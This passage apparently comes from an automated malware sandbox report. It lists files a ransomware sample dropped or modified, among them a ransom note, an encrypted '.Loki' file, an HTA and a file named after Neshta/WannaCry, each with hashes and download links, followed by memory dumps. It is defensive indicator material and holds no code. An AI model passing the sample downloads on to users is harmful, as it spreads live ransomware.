          6b63036a88f260b7a08da9814cf17ce0

          SHA1

          cac1bd549343a1c3fcefacc2d588155a00c4467b

          SHA256

          8f9fb3c2ce132a64e157738feaf82bb512ec03d03fa2da95c26470defeef513d

          SHA512

          383b8676a85e0f2447536bd15019c23bed15a51d633dafe5ac7bcbea75d8064ef9fd938461eab25df7f3eae3de18b87640e8cc12e95f7b58de1209937d8da284

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.EXE
          Filesize

          3.7MB

          MD5

          525f8201ec895d5d6bb2a7d344efa683

          SHA1

          a87dae5b06e86025abc91245809bcb81eb9aacf9

          SHA256

          39a089d363b15c37cca9f747a17e89ad1dbe0bc86ff23466526beaa5e36d6d4b

          SHA512

          f0a2070f11eb3f0bdf996ada42becc7710aab76e84268e5cdbbd9ecbf13ef5fb85b52b6227711137a9c511f8d731b018530cbf1935f8fcfd61ff2ef6c1348d63

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\SELFCERT.EXE
          Filesize

          549KB

          MD5

          61631e66dbe2694a93e5dc936dd273be

          SHA1

          b1838b8ca92fa5ca89e1108ceb2630a6ecd2b8c2

          SHA256

          5811b7b694d99c703b4c4bc72d6b7d846d05b2b0f45a7e3e4279cdb6fd81265f

          SHA512

          323463c267ccdb701d5967198f4f72158056f5a6e889c47bf19d1a670233ab071a5fe8c108430beb67753b77af1c59028007101a8e1266618fe91fa0127b4dcf

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\VPREVIEW.EXE
          Filesize

          606KB

          MD5

          9b1c9f74ac985eab6f8e5b27441a757b

          SHA1

          9a2cf7d2518c5f5db405e5bd8d37bf62dcaf34f5

          SHA256

          2a189b995a7283b503bb5864dd9ca57976b3812a6a34aaf89a7551336c43bc24

          SHA512

          d72e83aeaf1d34627a6c6aa469821af8a8d464a72c764fbb064484adea509a8c1d3628e2166859286e84daae8ebdf4f800693ce203984a8c313b1f2263e101c4

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
          Filesize

          1.4MB

          MD5

          5ae9c0c497949584ffa06f028a6605ab

          SHA1

          eb24dbd3c8952ee20411691326d650f98d24e992

          SHA256

          07dd9364be7babc5f9a08f0ccd828a9a55137845df1782b147f12943f234ea4e

          SHA512

          2e99bb500c281c367cc54fa283905b2537905ea4fe8986f676adbb1aaf58460dd2db082bb46a3dbe9dc836fbae3ee8832990839432dd99c74de58cc9b9295788

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\WORDICON.EXE
          Filesize

          1.8MB

          MD5

          cecae2d56247a70fef3bcf144b719e4f

          SHA1

          dcae4a07f4d790903464a6269de3aec2c90f2667

          SHA256

          d069ea7516fddea355d6c59ded63fff9aa472cc68aaeaf46203e46c0451713f2

          SHA512

          d9c1176b6eebb3f02398374d9e607475c4eddffd44e0867bcb59194796b06310e173e19c200bd5e313abbf351027dcb17265f2a5097b4d9cbfe7d76c3c72e0ed

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\XLICONS.EXE
          Filesize

          1.5MB

          MD5

          3fb6a617690f6f86fc6fc3867d637675

          SHA1

          864627282ebd1b624ccad30d69dc41674d00e0f8

          SHA256

          e06beca22c41317df5b8cbf2f0534b33b0886eb67ba3d4f30d39d8355ed31a3e

          SHA512

          600acb34502372ba371af964ab28e6f62f3eee64bd195ef9837577307a5e9ca1fa407d34ac6be7fb5b944dee359e82747d855a31eb3c5d7eb0d9e505739c19fa

          Download Submit

        • C:\ProgramData\snvnwf4j.exe
          Filesize

          32KB

          MD5

          03f055004522eb7e81605c9ed5071a2c

          SHA1

          bab6e8f52c5dfdb54d9064015d7f3b3edb934f2b

          SHA256

          da7710fc85c66d775d20e711e3fd6a865a8b9f131e4f5bc226a64009abb9b38c

          SHA512

          d8a055a5076ecc26cc66b5bae65f1457c66f0178d1c60e9277ba824ad8153f5db61e8c8c6bc0c7139a0c012cb8787320337aeb7a5e9b1fed97a68aab16e823a5

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RES670D.tmp
          Filesize

          29KB

          MD5

          64248feff6b21b5e1a75f753065b2fd7

          SHA1

          9f9d6c87b6668bae1b7e9e2522e8e67d955d0f30

          SHA256

          3a08ddf8cab7756e6bf221f733dcb9f4f785f34ea5ca56da0fd7c568638a2f70

          SHA512

          4fdef22b0ffab2bcdcd497d4c49104e5895742abd49d4019dc4fdc902722472b39f8a5ba8366f9d609e07529c076c7b798acde4b1a3e55dcc229cd5d86d590cf

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\info.hta
          Filesize

          3KB

          MD5

          0cd064b33f9f79daf730de56e0736b8a

          SHA1

          5565156a6750b455b5f08634cd60a4b126d1b98b

          SHA256

          9730ba970f708c1add7b557cf1fdabc445fd90e1d09c51b1e7c0430a896866cb

          SHA512

          962fb7413e3842f9fa73b1a1f0098cb5e20ae134d2c5f052c4e4167d019784d66cae175fc9b563c6674248ad64d3a8c6de631d0bd5164b0ffaebfe01e03ed4f8

          Download Submit

        • C:\Users\Admin\Desktop\Cpriv.Loki
          Filesize

          2KB

          MD5

          fbe4edde06ec74080d576052bd3bc152

          SHA1

          1e8f08b7f82099bd9030ad79f1093afc21953f0e

          SHA256

          54b090cb0fa0f60b67c9c9f19939deff7c86cf80a5fcc406ea5c64f795a57ed0

          SHA512

          f58540d5313bacd2582a3a56246db9e1226cccc3d8e37aca652254284cf98dfb0fb4f22e0583d1a12bbf999ae674be817f1ffcfd191a957fe949e42e016b36cb

          Download Submit

        • C:\Users\Admin\Downloads\Restore-My-Files.txt
          Filesize

          335B

          MD5

          613f59bd086f8e3ca2e50082f0460a38

          SHA1

          168072ca3d414600ad8e438429bb5f225a96afb2

          SHA256

          0976ef0d3b8ac4c2ea325d22d3c2a72308f71696435cca09cd1f49841189beb3

          SHA512

          b5d5cdfa82c720485d0ff0a145b68c489fbc8b7440ab1ad75c38733b27c72b83cd4a1e4bbea89c4d691f77021c399ed42aa0ea2002677d658e653074d010cbbe

          Download Submit

        • \??\c:\ProgramData\CSC2989BC7BA7734E57B0976BBAB850ADA3.TMP
          Filesize

          28KB

          MD5

          dbd3b88792c45177a7052f90d6fdab11

          SHA1

          9eaecd111afa880566c635f25c48039edf181661

          SHA256

          db95838d30d1e534a461e40ab20658ca94a3448ed6655113565c211fbfd46862

          SHA512

          77568c2129b8bbe17d0dfdf664022b0c0534afab6c505136f75cad13e4e6ffc4b7de2953ea334e0282c875fa02678e25a87d8f45ae250e592ec474bf701561e7

          Download Submit

        • \??\c:\Users\Admin\AppData\Local\Temp\kevqow5v\kevqow5v.0.cs
          Filesize

          1KB

          MD5

          b1cad72b068200145536022e86d14848

          SHA1

          8afd7e21b56e4f628d68ea8b6309965dc4095f6a

          SHA256

          04e19718630b4e74528b97903fb98725a28fcff9f0ecce1ee36471d98785f54a

          SHA512

          f129a1029023c22e45e660c50056e5fc6cbb3423309731cd3b016635f95d71c89bc096f53d7f961d545a188cdabdd42c9ed59cd368aaf7d1761b4ba967dac225

          Download Submit

        • \??\c:\Users\Admin\AppData\Local\Temp\kevqow5v\kevqow5v.cmdline
          Filesize

          236B

          MD5

          632e5662ba91e6cdacb880b9e8b08737

          SHA1

          7265f6a373e65fa7cfaddead146096c5ede059af

          SHA256

          e4029a686eaabcb494222fe7f7e58baa9f553dadb0e107e3e0d1516e9ba0fadb

          SHA512

          1c44830d4d05e78634eb35ab3ef94dd1bc7af54c1681aaf4510f802bc05e23ca204d26ef484659f010edecd2d892de8b26fab5b811cd2912746476d0b205747a

          Download Submit

        • \??\c:\Users\Admin\AppData\Local\Temp\ostdc0ka.ico
          Filesize

          27KB

          MD5

          dbc49b5f7714255217080c2e81f05a99

          SHA1

          4de2ef415d66d2bb8b389ba140a468b125388e19

          SHA256

          6d2f1f6164cbd331b9dc43b37948372e21b2ee45407aa99e199693835cded09c

          SHA512

          29a65eb7403bfc220fd057c2e6ea11b29bff545dfce2d3370ad462c66b03ae7f648efd480305423a49440de199a2a94c41214877b226a42dc2d1650683d149bb

          Download Submit

        • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
          Filesize

          252KB

          MD5

          9e2b9928c89a9d0da1d3e8f4bd96afa7

          SHA1

          ec66cda99f44b62470c6930e5afda061579cde35

          SHA256

          8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

          SHA512

          2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

          Download Submit

        • \Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
          Filesize

          480KB

          MD5

          dc2d7175e98b8592988849b695c179b1

          SHA1

          8061dcc212a3818cafcd5857ddd4fddde605d9df

          SHA256

          621736b0a31afd25930f89be064edcdbcd151480ea7f45ee6fa2fdb4c443ee9c

          SHA512

          329c5127c92e726c88d969aad32d79450eab3c614446ca4fd2d9e43e4beeec3eb1da2827e0e75629ce2f23770941f8f15e4310ffb532d28d6381143a62287762

          Download Submit

        • memory/2432-3530-0x0000000000400000-0x000000000041B000-memory.dmp

          Filesize

          108KB

          Download

        • memory/2432-129-0x0000000000400000-0x000000000041B000-memory.dmp

          Filesize

          108KB

          Download

        • memory/2680-12-0x000000013F0E0000-0x000000013F162000-memory.dmp

          Filesize

          520KB

          Download

        • memory/2680-11-0x000007FEF5353000-0x000007FEF5354000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2680-393-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2680-124-0x000007FEF5353000-0x000007FEF5354000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2680-125-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2680-128-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2680-29-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2680-19-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2680-22-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2680-25-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

          Filesize

          9.9MB

          Download